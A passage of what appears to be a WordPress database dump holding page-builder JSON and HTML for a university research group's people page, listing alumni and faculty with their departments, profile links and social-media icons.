Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c190\",\"index\":1,\"id\":\"182-c194\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c195\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c196\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-ruby_parcells-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":853,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c197\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c195\",\"index\":2,\"id\":\"182-c198\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c199\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c199\",\"index\":0,\"id\":\"182-c200\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Reshmanjali-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1600,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c199\",\"index\":0,\"id\":\"182-c201\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c199\",\"index\":2,\"id\":\"182-c202\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c199\",\"index\":1,\"id\":\"182-c203\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c204\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c204\",\"index\":0,\"id\":\"182-c205\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bronson.png\",\"caption\":{\"text\":\"\"},\"imageId\":817,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c204\",\"index\":0,\"id\":\"182-c206\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c204\",\"index\":2,\"id\":\"182-c207\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c204\",\"index\":1,\"id\":\"182-c208\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c159\",\"parentId\":\"182-c158\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c158\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c211\",\"parentId\":\"182-c210\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c210\",\"parentId\":\"182-c209\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c209\",\"parentId\":\"182-c158\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2023-10-13 10:39:42','2023-10-13 14:39:42','',562,'https://gsudice.dataconn.net/?p=1766',0,'revision','',0),(1767,1,'2023-10-13 10:39:42','2023-10-13 14:39:42','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c2\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c64\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c64 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c65-outer\">\n            <div data-colibri-id=\"182-c65\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c65 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c66\" class=\"h-global-transition-all h-heading style-986 style-local-182-c66 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c66\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c4-outer\">\n            <div data-colibri-id=\"182-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c5\" class=\"d-block style-973 style-local-182-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\" class=\"wp-image-1697 style-973-image style-local-182-c5-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c5-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c6\" class=\"h-global-transition-all h-heading style-974 style-local-182-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c7\" class=\"h-text h-text-component style-975 style-local-182-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c8\" class=\"h-text h-text-component style-976 style-local-182-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c9\" class=\"style-977 style-local-182-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c10-outer\">\n            <div data-colibri-id=\"182-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c11\" class=\"d-block style-978 style-local-182-c11 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-Portrait-1-e1697202215204.jpeg\" class=\"wp-image-1701 style-978-image style-local-182-c11-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c11-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c12\" class=\"h-global-transition-all h-heading style-974 style-local-182-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Armin Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c13\" class=\"h-text h-text-component style-975 style-local-182-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p> Chair and Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c14\" class=\"h-text h-text-component style-976 style-local-182-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c15\" class=\"style-979 style-local-182-c15 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 